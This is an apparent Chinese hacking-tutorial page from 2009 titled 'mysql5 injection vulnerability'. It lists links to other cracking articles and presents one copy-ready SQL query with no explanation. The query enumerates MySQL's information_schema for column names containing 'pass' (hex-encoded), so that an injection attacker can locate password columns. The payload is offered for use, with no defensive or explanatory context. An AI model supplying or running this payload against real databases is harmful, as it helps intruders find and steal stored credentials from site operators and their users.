当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > mysql5 注入漏洞

黑客技术
密码破解以及抗击手段(1)
密码破解以及抗击手段(2)
密码破解以及抗击手段(3)
密码破解以及抗击手段(4)
加密解密大比拼(1)
加密解密大比拼(2)
加密解密大比拼(3)
加密解密大比拼(4)
加密解密大比拼(5)
加密解密大比拼(6)
加密解密大比拼(7)
密码与Crack工具研究(1)
密码与Crack工具研究(2)
密码与Crack工具研究(3)
密码与Crack工具研究(4)
软件狗[Dongles]的加密与解密技术(1)
软件狗[Dongles]的加密与解密技术(2)
软件狗[Dongles]的加密与解密技术(3)
软件狗[Dongles]的加密与解密技术(4)
软件狗[Dongles]的加密与解密技术(5)

黑客技术 中的 mysql5 注入漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 119 ::
收藏到网摘: n/a

mysql5注入漏洞代码
复制代码 代码如下:

select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_schema`.`COLUMNS`.table_name=information_schema.tables.table_name where `information_schema`.`COLUMNS`.column_name like 0x257061737325 limit 0,1;